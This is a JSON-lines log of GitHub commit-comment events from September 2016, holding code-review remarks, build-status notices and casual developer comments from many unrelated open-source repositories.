{"id":"4564134986","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19025525,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T19:42:08Z","updated_at":"2016-09-14T19:42:08Z","body":"[CvGameCore_Expansion2.zip](https://github.com/LoneGazebo/Community-Patch-DLL/files/473324/CvGameCore_Expansion2.zip)\r\n"}},"created_at":"2016-09-14T19:42:08Z"}
{"id":"4564136627","type":"CommitCommentEvent","actor":{"login":"dakrone"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19025529,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T19:42:27Z","updated_at":"2016-09-14T19:42:27Z","body":"I think I'm in favor of reverting the change and working on something that allows people to construct their own query-string lines in different formats."}},"created_at":"2016-09-14T19:42:27Z"}
{"id":"4564137357","type":"CommitCommentEvent","actor":{"login":"mikey0000"},"repo":{"name":"mikey0000/device-softwinner"},"payload":{"comment":{"id":19025531,"position":19,"line":132,"path":"tulip-chiphd/tulip_chiphd_atv.mk","commit_id":"af984dfbbd33a01d75b6e0157111def5b2f37ca3","created_at":"2016-09-14T19:42:36Z","updated_at":"2016-09-14T19:42:36Z","body":"should remove this line as its pretty redundant"}},"created_at":"2016-09-14T19:42:36Z"}
{"id":"4564143301","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19025546,"position":6,"line":75,"path":"youtube_dl/extractor/adobepass.py","commit_id":"797c636bcb02d1199015b753d26430eec13c4b2b","created_at":"2016-09-14T19:43:45Z","updated_at":"2016-09-14T19:43:45Z","body":"Adobe Primetime also used sometimes as an alias to the Adobe Flash Access."}},"created_at":"2016-09-14T19:43:45Z"}
{"id":"4564146793","type":"CommitCommentEvent","actor":{"login":"jkaldenbach"},"repo":{"name":"jkaldenbach/holynoter"},"payload":{"comment":{"id":19025555,"position":4,"line":22323,"path":"index.js","commit_id":"221fc239d1ac4f866ae3635276b8abc4cb0ff3f0","created_at":"2016-09-14T19:44:27Z","updated_at":"2016-09-14T19:44:27Z","body":"comment"}},"created_at":"2016-09-14T19:44:27Z"}
{"id":"4564149031","type":"CommitCommentEvent","actor":{"login":"elhamkiu"},"repo":{"name":"elhamkiu/new1"},"payload":{"comment":{"id":19025559,"position":3,"line":3,"path":".gitignore","commit_id":"1cb807f50ebdbce74aded73a7e8260da748eaa20","created_at":"2016-09-14T19:44:54Z","updated_at":"2016-09-14T19:44:54Z","body":"I want to change it"}},"created_at":"2016-09-14T19:44:54Z"}
{"id":"4564151745","type":"CommitCommentEvent","actor":{"login":"camilonova"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025564,"position":12,"line":17,"path":"constance/__init__.py","commit_id":"94fabdf7c300d3d164d25e7db1b60c77612c943c","created_at":"2016-09-14T19:45:23Z","updated_at":"2016-09-14T19:45:23Z","body":"@jezdez Thank you. If I move the code to `constance.signals` how I should load it?"}},"created_at":"2016-09-14T19:45:23Z"}
{"id":"4564152601","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19025568,"position":5,"line":425,"path":"js/state/siteUtil.js","commit_id":"7f1354b3eff96389fac917c7020a22d06b641984","created_at":"2016-09-14T19:45:33Z","updated_at":"2016-09-14T19:45:33Z","body":"k sgtm"}},"created_at":"2016-09-14T19:45:33Z"}
{"id":"4564153387","type":"CommitCommentEvent","actor":{"login":"samccone"},"repo":{"name":"s3ththompson/coverage-ext"},"payload":{"comment":{"id":19025570,"position":null,"line":null,"path":null,"commit_id":"72f822619596330d4c5e6a24c6c10e5862ac6e8c","created_at":"2016-09-14T19:45:43Z","updated_at":"2016-09-14T19:45:43Z","body":"I think the real fix is https://github.com/samccone/coverage-ext/pull/2/files#r78823945\r\n\r\nwhich I will let @mAiNiNfEcTiOn go ahead and apply this :)"}},"created_at":"2016-09-14T19:45:43Z"}
{"id":"4564154141","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"cruhPEL/bloc-jams"},"payload":{"comment":{"id":19025575,"position":11,"line":230,"path":"scripts/album.js","commit_id":"744fd7470a1c401ad34fe4f91a836d6a53d0be11","created_at":"2016-09-14T19:45:51Z","updated_at":"2016-09-14T19:45:51Z","body":"You created a variable for this."}},"created_at":"2016-09-14T19:45:51Z"}
{"id":"4564154262","type":"CommitCommentEvent","actor":{"login":"camilonova"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025576,"position":null,"line":null,"path":null,"commit_id":"90bf97c0a938b922a147e0d187caa8ce7dd5a5f2","created_at":"2016-09-14T19:45:52Z","updated_at":"2016-09-14T19:45:52Z","body":"Yes sr"}},"created_at":"2016-09-14T19:45:52Z"}
{"id":"4564155609","type":"CommitCommentEvent","actor":{"login":"dawsonc623"},"repo":{"name":"cruhPEL/bloc-jams"},"payload":{"comment":{"id":19025584,"position":15,"line":234,"path":"scripts/album.js","commit_id":"744fd7470a1c401ad34fe4f91a836d6a53d0be11","created_at":"2016-09-14T19:46:08Z","updated_at":"2016-09-14T19:46:08Z","body":"You created a variable for this."}},"created_at":"2016-09-14T19:46:08Z"}
{"id":"4564158112","type":"CommitCommentEvent","actor":{"login":"s3ththompson"},"repo":{"name":"s3ththompson/coverage-ext"},"payload":{"comment":{"id":19025593,"position":null,"line":null,"path":null,"commit_id":"72f822619596330d4c5e6a24c6c10e5862ac6e8c","created_at":"2016-09-14T19:46:36Z","updated_at":"2016-09-14T19:46:36Z","body":"\"real fix\" :P agreed, though. going to delete"}},"created_at":"2016-09-14T19:46:36Z"}
{"id":"4564161054","type":"CommitCommentEvent","actor":{"login":"ayufan"},"repo":{"name":"mikey0000/device-softwinner"},"payload":{"comment":{"id":19025600,"position":19,"line":132,"path":"tulip-chiphd/tulip_chiphd_atv.mk","commit_id":"af984dfbbd33a01d75b6e0157111def5b2f37ca3","created_at":"2016-09-14T19:47:12Z","updated_at":"2016-09-14T19:47:12Z","body":"Why you did put move `vendor/google/atv-build/atv-vendor.mk`?"}},"created_at":"2016-09-14T19:47:12Z"}
{"id":"4564167069","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025613,"position":12,"line":17,"path":"constance/__init__.py","commit_id":"94fabdf7c300d3d164d25e7db1b60c77612c943c","created_at":"2016-09-14T19:48:21Z","updated_at":"2016-09-14T19:48:21Z","body":"You mean in the backends? Wouldn't `from ..signals import updated_signal` work?\r\n\r\nOh, since signals are also a public API for other developers to connect their callbacks with, please rename it to another name, e.g. `config_updated`."}},"created_at":"2016-09-14T19:48:21Z"}
{"id":"4564168287","type":"CommitCommentEvent","actor":{"login":"johnvanbreda"},"repo":{"name":"Indicia-Team/warehouse"},"payload":{"comment":{"id":19025614,"position":null,"line":null,"path":null,"commit_id":"14a3e3a0b168a981fef3250fd5d2e01cdf3833ec","created_at":"2016-09-14T19:48:35Z","updated_at":"2016-09-14T19:48:35Z","body":"Fixes #205"}},"created_at":"2016-09-14T19:48:35Z"}
{"id":"4564170390","type":"CommitCommentEvent","actor":{"login":"olenasblv"},"repo":{"name":"olenasblv/java_training"},"payload":{"comment":{"id":19025618,"position":null,"line":null,"path":null,"commit_id":"90ccfb4bbfdfeb6415d565907a4dff541e73a7a2","created_at":"2016-09-14T19:49:01Z","updated_at":"2016-09-14T19:49:01Z","body":"I wrote this for self training"}},"created_at":"2016-09-14T19:49:01Z"}
{"id":"4564170487","type":"CommitCommentEvent","actor":{"login":"kakwa"},"repo":{"name":"kakwa/puppet-samba"},"payload":{"comment":{"id":19025619,"position":null,"line":null,"path":null,"commit_id":"63509d2bd8a3bbe2125ff97953701a23216b311e","created_at":"2016-09-14T19:49:02Z","updated_at":"2016-09-14T19:49:02Z","body":"test"}},"created_at":"2016-09-14T19:49:02Z"}
{"id":"4564172306","type":"CommitCommentEvent","actor":{"login":"lexgator"},"repo":{"name":"lexgator/hello-world"},"payload":{"comment":{"id":19025620,"position":null,"line":null,"path":null,"commit_id":"3d557fd391085ab1e7f1f0c9670ef5abacd2130a","created_at":"2016-09-14T19:49:23Z","updated_at":"2016-09-14T19:49:23Z","body":"Making some changes as part of the tutorial"}},"created_at":"2016-09-14T19:49:23Z"}
{"id":"4564172682","type":"CommitCommentEvent","actor":{"login":"milushov"},"repo":{"name":"reevader/codepen-favs"},"payload":{"comment":{"id":19025621,"position":13,"line":13,"path":"scraper.js","commit_id":"a80dc0f4b03b1e97f88e5b517337fc97cfb7003e","created_at":"2016-09-14T19:49:27Z","updated_at":"2016-09-14T19:49:27Z","body":"привет"}},"created_at":"2016-09-14T19:49:27Z"}
{"id":"4564172912","type":"CommitCommentEvent","actor":{"login":"Kumaava"},"repo":{"name":"Kumaava/Java_OOP-DesignPatterns"},"payload":{"comment":{"id":19025624,"position":null,"line":null,"path":null,"commit_id":"000e9a258cc2cc31876c4e62394c9e53bcbc376c","created_at":"2016-09-14T19:49:30Z","updated_at":"2016-09-14T19:49:30Z","body":"WHERE TO USE FACTORY DESIGN PATTERN"}},"created_at":"2016-09-14T19:49:30Z"}
{"id":"4564177845","type":"CommitCommentEvent","actor":{"login":"vitalyster"},"repo":{"name":"robbiehanson/XMPPFramework"},"payload":{"comment":{"id":19025634,"position":null,"line":null,"path":null,"commit_id":"3785ef4271c06153c222f6102bdab08d45870038","created_at":"2016-09-14T19:50:26Z","updated_at":"2016-09-14T19:50:26Z","body":"Should it work with OSX target?"}},"created_at":"2016-09-14T19:50:26Z"}
{"id":"4564178223","type":"CommitCommentEvent","actor":{"login":"Prakhiltp"},"repo":{"name":"Team-Tree-House/treehouse-templates"},"payload":{"comment":{"id":19025637,"position":15,"line":69,"path":"sample/sngist.html","commit_id":"9bfdeb9d11f0973f975351aa79ce1f7cdf89e24a","created_at":"2016-09-14T19:50:31Z","updated_at":"2016-09-14T19:50:31Z","body":"useless command. there's no shadow working on there\r\n"}},"created_at":"2016-09-14T19:50:31Z"}
{"id":"4564180041","type":"CommitCommentEvent","actor":{"login":"partouf"},"repo":{"name":"partouf/AudacityRover"},"payload":{"comment":{"id":19025639,"position":29,"line":62,"path":"System/Modules.cpp","commit_id":"16a551dee6e6cf66a64757a20e47d6dea743729c","created_at":"2016-09-14T19:50:51Z","updated_at":"2016-09-14T19:50:51Z","body":"should probably be std::runtime_error"}},"created_at":"2016-09-14T19:50:51Z"}
{"id":"4564183795","type":"CommitCommentEvent","actor":{"login":"nfeuerstein"},"repo":{"name":"Esri/solutions-geoprocessing-toolbox"},"payload":{"comment":{"id":19025648,"position":null,"line":null,"path":null,"commit_id":"4a3190fdf25acde3500d99a4db2cba7dbead2457","created_at":"2016-09-14T19:51:30Z","updated_at":"2016-09-14T19:51:30Z","body":"Good catch @mfunk - the solutions geoprocessing toolbox repo is living on."}},"created_at":"2016-09-14T19:51:30Z"}
{"id":"4564184197","type":"CommitCommentEvent","actor":{"login":"wolever"},"repo":{"name":"blunney1/pg-histogram"},"payload":{"comment":{"id":19025650,"position":null,"line":null,"path":null,"commit_id":"6b6f4579b907d607ec1b14aa7ab44712dd9dbab8","created_at":"2016-09-14T19:51:36Z","updated_at":"2016-09-14T19:51:36Z","body":"Thanks! Mind making this a PR?"}},"created_at":"2016-09-14T19:51:36Z"}
{"id":"4564184543","type":"CommitCommentEvent","actor":{"login":"partouf"},"repo":{"name":"partouf/AudacityRover"},"payload":{"comment":{"id":19025652,"position":5,"line":203,"path":"main.cpp","commit_id":"16a551dee6e6cf66a64757a20e47d6dea743729c","created_at":"2016-09-14T19:51:39Z","updated_at":"2016-09-14T19:51:39Z","body":"should probably be std:cerr"}},"created_at":"2016-09-14T19:51:39Z"}
{"id":"4564190866","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19025669,"position":null,"line":null,"path":null,"commit_id":"a62e551bd7891a09b917d9044ebd2561bfefbd84","created_at":"2016-09-14T19:52:49Z","updated_at":"2016-09-14T19:52:49Z","body":"Wait, @SalmonGER testet i guess"}},"created_at":"2016-09-14T19:52:49Z"}
{"id":"4564193508","type":"CommitCommentEvent","actor":{"login":"Bizadon"},"repo":{"name":"istornz/iPokeGo"},"payload":{"comment":{"id":19025672,"position":null,"line":null,"path":null,"commit_id":"17c7f97091900fab0e3dba4100b3810d9921cd38","created_at":"2016-09-14T19:53:18Z","updated_at":"2016-09-14T19:53:18Z","body":"@istornz can you explain how does it work? Does it must find an address?"}},"created_at":"2016-09-14T19:53:18Z"}
{"id":"4564194091","type":"CommitCommentEvent","actor":{"login":"webarata3"},"repo":{"name":"webarata3/KExcelAPI"},"payload":{"comment":{"id":19025674,"position":6,"line":44,"path":"src/main/kotlin/link/arata/kexcelapi/KExcel.kt","commit_id":"132754bbe31ec6595b75ccd39cf4ea830021babe","created_at":"2016-09-14T19:53:25Z","updated_at":"2016-09-14T19:53:25Z","body":"test"}},"created_at":"2016-09-14T19:53:25Z"}
{"id":"4564195701","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19025676,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T19:53:44Z","updated_at":"2016-09-14T19:53:44Z","body":"What's the strategy with sound- and network packages? Will they go to designated groups?"}},"created_at":"2016-09-14T19:53:44Z"}
{"id":"4564197081","type":"CommitCommentEvent","actor":{"login":"krizhanovsky"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19025681,"position":16,"line":5450,"path":"sql/field.cc","commit_id":"9d44987918e296b67dde847b5d44355abd965ce8","created_at":"2016-09-14T19:54:00Z","updated_at":"2016-09-14T19:54:00Z","body":"Why the lines have different identations?"}},"created_at":"2016-09-14T19:54:00Z"}
{"id":"4564197689","type":"CommitCommentEvent","actor":{"login":"camilonova"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19025683,"position":12,"line":17,"path":"constance/__init__.py","commit_id":"94fabdf7c300d3d164d25e7db1b60c77612c943c","created_at":"2016-09-14T19:54:08Z","updated_at":"2016-09-14T19:54:08Z","body":"Done, please check out the PR."}},"created_at":"2016-09-14T19:54:08Z"}
{"id":"4564197830","type":"CommitCommentEvent","actor":{"login":"krizhanovsky"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19025684,"position":5,"line":648,"path":"sql/field.h","commit_id":"9d44987918e296b67dde847b5d44355abd965ce8","created_at":"2016-09-14T19:54:10Z","updated_at":"2016-09-14T19:54:10Z","body":"patch noise"}},"created_at":"2016-09-14T19:54:10Z"}
{"id":"4564199696","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19025688,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-14T19:54:29Z","updated_at":"2016-09-14T19:54:29Z","body":"@SCdF Consider making the filters left aligned and directly below the header in mobile view."}},"created_at":"2016-09-14T19:54:29Z"}
{"id":"4564201343","type":"CommitCommentEvent","actor":{"login":"reshama"},"repo":{"name":"hengrumay/dsp"},"payload":{"comment":{"id":19025690,"position":null,"line":null,"path":null,"commit_id":"dd32365772c512f931b23db8900ed25ca2253c60","created_at":"2016-09-14T19:54:48Z","updated_at":"2016-09-14T19:54:48Z","body":"hi @hengrumay \r\ncc:  @aramnath @lucdemortier @gfsoileau\r\n\r\nRE:  command line \r\n\r\n--\r\n\r\nGreat job on the this section! 👍 "}},"created_at":"2016-09-14T19:54:48Z"}
{"id":"4564202329","type":"CommitCommentEvent","actor":{"login":"krizhanovsky"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19025693,"position":69,"line":849,"path":"sql/sql_update.cc","commit_id":"9d44987918e296b67dde847b5d44355abd965ce8","created_at":"2016-09-14T19:54:59Z","updated_at":"2016-09-14T19:54:59Z","body":"All following changes are just patch noise - please remove"}},"created_at":"2016-09-14T19:54:59Z"}
{"id":"4564202741","type":"CommitCommentEvent","actor":{"login":"partouf"},"repo":{"name":"partouf/OpenALRF"},"payload":{"comment":{"id":19025696,"position":20,"line":77,"path":"Sensors/Sensors.cpp","commit_id":"288ad3d8e2a8b375e5f998200c1b5443ecedf5be","created_at":"2016-09-14T19:55:05Z","updated_at":"2016-09-14T19:55:05Z","body":"Stream directly to ostr instead"}},"created_at":"2016-09-14T19:55:05Z"}
{"id":"4564203276","type":"CommitCommentEvent","actor":{"login":"edbrannin"},"repo":{"name":"andialbrecht/sqlparse"},"payload":{"comment":{"id":19025698,"position":20,"line":440,"path":"tests/test_format.py","commit_id":"4d05b441fcb801d320ac52ce90465b74d419ceac","created_at":"2016-09-14T19:55:13Z","updated_at":"2016-09-14T19:55:13Z","body":"It would be nice if the comma were back 2 spaces, to align all the list-items."}},"created_at":"2016-09-14T19:55:13Z"}
{"id":"4564207355","type":"CommitCommentEvent","actor":{"login":"edbrannin"},"repo":{"name":"andialbrecht/sqlparse"},"payload":{"comment":{"id":19025702,"position":20,"line":440,"path":"tests/test_format.py","commit_id":"4d05b441fcb801d320ac52ce90465b74d419ceac","created_at":"2016-09-14T19:55:48Z","updated_at":"2016-09-14T19:55:48Z","body":"...at least, that's how I think I usually see comma-first formatting.  #bikeshed"}},"created_at":"2016-09-14T19:55:48Z"}
{"id":"4564207619","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19025704,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T19:55:51Z","updated_at":"2016-09-14T19:55:51Z","body":"[CvGameCore_Expansion2.zip](https://github.com/LoneGazebo/Community-Patch-DLL/files/473352/CvGameCore_Expansion2.zip)\r\n"}},"created_at":"2016-09-14T19:55:51Z"}
{"id":"4564207718","type":"CommitCommentEvent","actor":{"login":"johnvanbreda"},"repo":{"name":"Indicia-Team/warehouse"},"payload":{"comment":{"id":19025705,"position":null,"line":null,"path":null,"commit_id":"23c72bf96f975b3026eb7b53d699b21163cd1641","created_at":"2016-09-14T19:55:52Z","updated_at":"2016-09-14T19:55:52Z","body":"Fixes #206"}},"created_at":"2016-09-14T19:55:52Z"}
{"id":"4564209851","type":"CommitCommentEvent","actor":{"login":"christian-bromann"},"repo":{"name":"webdriverio/webdrivercss"},"payload":{"comment":{"id":19025706,"position":28,"line":56,"path":"package.json","commit_id":"cc4c99410025bc0aab9810dbdc1ab2314881c37f","created_at":"2016-09-14T19:56:17Z","updated_at":"2016-09-14T19:56:17Z","body":"please see http://blog.kevinlamping.com/whats-up-with-webdrivercss/"}},"created_at":"2016-09-14T19:56:17Z"}
{"id":"4564211013","type":"CommitCommentEvent","actor":{"login":"dietmarw"},"repo":{"name":"denistwo/FeedDriveLibrary"},"payload":{"comment":{"id":19025708,"position":6,"line":26,"path":"README.md","commit_id":"26ae460adaa5b0ec08a8c0b3f66730c167808601","created_at":"2016-09-14T19:56:29Z","updated_at":"2016-09-14T19:56:29Z","body":"Closing tag looks like this: `<br />`, i.e., forward slash rather than backward slash. For markdown (and HTML) `<br>` would be sufficient."}},"created_at":"2016-09-14T19:56:29Z"}
{"id":"4564215205","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19025723,"position":null,"line":null,"path":null,"commit_id":"90ad02bf626b885a5dd8967894e2eafc953bdf92","created_at":"2016-09-14T19:57:16Z","updated_at":"2016-09-14T19:57:16Z","body":"Can we get rid of negative lookup cache now for http2?"}},"created_at":"2016-09-14T19:57:16Z"}
{"id":"4564216742","type":"CommitCommentEvent","actor":{"login":"MayeulChassagnard"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19025727,"position":null,"line":null,"path":null,"commit_id":"4c36ce01b64c7ad203128a4dc99ad381f43e8ab4","created_at":"2016-09-14T19:57:32Z","updated_at":"2016-09-14T19:57:32Z","body":"Well, it seems that it maybe not comes from the fact that self.object() is not a callable object since a.instantiate_bar().[TAB] goes through PyInstanceNew and print well bar_instance_member."}},"created_at":"2016-09-14T19:57:32Z"}
{"id":"4564219524","type":"CommitCommentEvent","actor":{"login":"jonathanong"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19025731,"position":5,"line":3,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-14T19:58:01Z","updated_at":"2016-09-14T19:58:01Z","body":"now you have to compile your node moduels with babel for htis to work"}},"created_at":"2016-09-14T19:58:01Z"}
{"id":"4564221726","type":"CommitCommentEvent","actor":{"login":"jonathanong"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19025735,"position":12,"line":7,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-14T19:58:24Z","updated_at":"2016-09-14T19:58:24Z","body":"why are you declaring `const` when you're changing it in the lines below?"}},"created_at":"2016-09-14T19:58:24Z"}
{"id":"4564224240","type":"CommitCommentEvent","actor":{"login":"jonathanong"},"repo":{"name":"paramaggarwal/react-progressbar"},"payload":{"comment":{"id":19025740,"position":13,"line":8,"path":"lib/index.js","commit_id":"c1d8b035cbdf9a9b2022c110f9b8e82f9273503e","created_at":"2016-09-14T19:58:51Z","updated_at":"2016-09-14T19:58:51Z","body":"why are you setting `completed` to `NaN`? it shouldn't even be `==` or `===` - you have to use `isNaN`"}},"created_at":"2016-09-14T19:58:51Z"}
{"id":"4564227117","type":"CommitCommentEvent","actor":{"login":"dietmarw"},"repo":{"name":"denistwo/FeedDriveLibrary"},"payload":{"comment":{"id":19025744,"position":null,"line":null,"path":null,"commit_id":"cc4c606bc4a623979ac8fbd064b6bbcd6ae61a92","created_at":"2016-09-14T19:59:22Z","updated_at":"2016-09-14T19:59:22Z","body":"You can not tell people which license **they** should use but what license **your** code is under. Other people can then develop using either the same license that is compatible with your license. Dual licensing of BSD and MIT does not make much sense since they are *very* alike. Just pick one of them :smiley: "}},"created_at":"2016-09-14T19:59:22Z"}
{"id":"4564228695","type":"CommitCommentEvent","actor":{"login":"jaimecasero"},"repo":{"name":"RestComm/load-balancer"},"payload":{"comment":{"id":19025749,"position":13,"line":1381,"path":"jar/src/main/java/org/mobicents/tools/sip/balancer/SIPBalancerForwarder.java","commit_id":"b0653ffbcd49c4891c4bcf71da694079efec82f2","created_at":"2016-09-14T19:59:41Z","updated_at":"2016-09-14T19:59:41Z","body":"is this condition correct?\r\n"}},"created_at":"2016-09-14T19:59:41Z"}
{"id":"4564230342","type":"CommitCommentEvent","actor":{"login":"jaimecasero"},"repo":{"name":"RestComm/load-balancer"},"payload":{"comment":{"id":19025753,"position":31,"line":1399,"path":"jar/src/main/java/org/mobicents/tools/sip/balancer/SIPBalancerForwarder.java","commit_id":"b0653ffbcd49c4891c4bcf71da694079efec82f2","created_at":"2016-09-14T19:59:58Z","updated_at":"2016-09-14T19:59:58Z","body":"should we add or replace existing?"}},"created_at":"2016-09-14T19:59:58Z"}
{"id":"4559403580","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaStats/TimeSeries.jl"},"payload":{"comment":{"id":19011849,"position":14,"line":28,"path":"test/timearray.jl","commit_id":"42fc178eccbad57d098b50b6dafbcebd7a3d2380","created_at":"2016-09-14T02:01:48Z","updated_at":"2016-09-14T02:01:48Z","body":"is this throwing what you think it's throwing?"}},"created_at":"2016-09-14T02:01:48Z"}
{"id":"4559404275","type":"CommitCommentEvent","actor":{"login":"NathanW2"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19011852,"position":null,"line":null,"path":null,"commit_id":"406757de6b3e048ce50d12432a207daab722bf73","created_at":"2016-09-14T02:02:04Z","updated_at":"2016-09-14T02:02:04Z","body":"Good point"}},"created_at":"2016-09-14T02:02:04Z"}
{"id":"4559406642","type":"CommitCommentEvent","actor":{"login":"faizauthar12"},"repo":{"name":"Ferrari-Dev-Team/android_device_xiaomi_ferrari"},"payload":{"comment":{"id":19011855,"position":null,"line":null,"path":null,"commit_id":"b0424a779c7698073e185ab7f87ef2b39b4319da","created_at":"2016-09-14T02:02:50Z","updated_at":"2016-09-14T02:02:50Z","body":"@hashroot, Stuck at bootanimation ..."}},"created_at":"2016-09-14T02:02:50Z"}
{"id":"4559409230","type":"CommitCommentEvent","actor":{"login":"Typhares"},"repo":{"name":"Typhares/hello-world"},"payload":{"comment":{"id":19011863,"position":8,"line":11,"path":"README.md","commit_id":"41db49fceedc0ce7c8a2f6538380c497585a32a4","created_at":"2016-09-14T02:03:45Z","updated_at":"2016-09-14T02:03:45Z","body":"![beautiful_bird_white_peacock_wallpaper_hd_9](https://cloud.githubusercontent.com/assets/22136715/18497640/eb7d2756-79fd-11e6-93ed-428dd114d16d.jpg)\r\n"}},"created_at":"2016-09-14T02:03:45Z"}
{"id":"4559412913","type":"CommitCommentEvent","actor":{"login":"NeuroWhAI"},"repo":{"name":"phillyai/Aheuiplusplus"},"payload":{"comment":{"id":19011871,"position":47,"line":43,"path":"Aheui++/Aheui.cs","commit_id":"972019b2dc656a076e5f6eb610da86175d38406f","created_at":"2016-09-14T02:05:07Z","updated_at":"2016-09-14T02:05:07Z","body":"while (IsFinished)가 아니라 while (!IsFinished)로 쓰여야 맞는것 같은ㄷ"}},"created_at":"2016-09-14T02:05:07Z"}
{"id":"4559416178","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19011880,"position":null,"line":null,"path":null,"commit_id":"2f26f91c3185ff99dc91402f92fc2ab47b1a17fa","created_at":"2016-09-14T02:06:04Z","updated_at":"2016-09-14T02:06:04Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 27](http://teamcity.otenv.com/viewLog.html?buildId=5209903&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T02:06:04Z"}
{"id":"4559417288","type":"CommitCommentEvent","actor":{"login":"xSmurf"},"repo":{"name":"subgraph/oz"},"payload":{"comment":{"id":19011884,"position":1,"line":1,"path":".gitignore","commit_id":"e14658af991b00164a0682015261c7d66265772d","created_at":"2016-09-14T02:06:26Z","updated_at":"2016-09-14T02:06:26Z","body":"Wait wat? :whale2:"}},"created_at":"2016-09-14T02:06:26Z"}
{"id":"4559418143","type":"CommitCommentEvent","actor":{"login":"billho"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":19011886,"position":null,"line":null,"path":null,"commit_id":"efb8a99939be466b5b32c66e15ac6f1d47b7b625","created_at":"2016-09-14T02:06:45Z","updated_at":"2016-09-14T02:06:45Z","body":"ORZ"}},"created_at":"2016-09-14T02:06:45Z"}
{"id":"4559421739","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19011895,"position":null,"line":null,"path":null,"commit_id":"2f26f91c3185ff99dc91402f92fc2ab47b1a17fa","created_at":"2016-09-14T02:08:05Z","updated_at":"2016-09-14T02:08:05Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 27](http://teamcity.otenv.com/viewLog.html?buildId=5209903&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Tests failed: 10 (10 new), passed: 18 Build time: 00:02:01\n### Failed tests\n```\nRestaurantSearchBuilder: successful build: returns the mapped and validated by email search model: <no details avaliable>\n\nRestaurantSearchBuilder: successful build: returns the mapped and validated by user search model: <no details avaliable>\n\nRestaurantSearchBuilder: invalid email criteria: returns an error when email model is invalid: <no details avaliable>\n\nRestaurantSearchBuilder: invalid userId criteria: returns an error when user model is invalid: <no details avaliable>\n\nByEmailRestaurantSearchModel: valid request: returns the valid model: <no details avaliable>\n\nByEmailRestaurantSearchModel: invalid request: returns an error message: <no details avaliable>\n\nByUserRestaurantSearchModel: valid request: returns the valid model: <no details avaliable>\n\nByUserRestaurantSearchModel: invalid request: returns an error message: <no details avaliable>\n\nRestaurantSearchService: http 200 response from restaurant search server: \"before each\" hook for \"should return a successful response with a list of restaurants\": <no details avaliable>\n\nRestaurantSearchService: http 500 response from restaurant search server: \"before each\" hook for \"should catch the error\": <no details avaliable>\n\n```\n"}},"created_at":"2016-09-14T02:08:05Z"}
{"id":"4559423179","type":"CommitCommentEvent","actor":{"login":"phillyai"},"repo":{"name":"phillyai/Aheuiplusplus"},"payload":{"comment":{"id":19011900,"position":47,"line":43,"path":"Aheui++/Aheui.cs","commit_id":"972019b2dc656a076e5f6eb610da86175d38406f","created_at":"2016-09-14T02:08:35Z","updated_at":"2016-09-14T02:08:35Z","body":"보통 이런건 이슈로 하잖아요 ㅋㅋㅋ 쨌든 감사!\r\n@NeuroWhAI "}},"created_at":"2016-09-14T02:08:35Z"}
